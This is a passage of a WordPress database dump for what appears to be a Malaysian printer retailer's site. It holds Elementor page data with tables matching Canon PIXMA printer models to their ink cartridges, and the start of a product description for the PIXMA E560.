width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3888,2736,'_elementor_version','0.4'),(3891,2737,'_edit_lock','1545623174:1'),(3892,2737,'_edit_last','1'),(3893,2737,'_wp_page_template','template-fullwidth.php'),(3894,2737,'_hide_page_title',''),(3895,2737,'_hide_header',''),(3896,2737,'_hide_footer',''),(3897,2737,'_hide_breadcrumb',''),(3898,2737,'_cover',''),(3899,2737,'_show_excerpt',''),(3900,2737,'_wc_apply_product',''),(3901,2737,'_yoast_wpseo_content_score','90'),(3902,2742,'_wp_page_template','template-fullwidth.php'),(3903,2742,'_elementor_edit_mode','builder'),(3904,2742,'_elementor_template_type','post'),(3905,2742,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"11\\\" 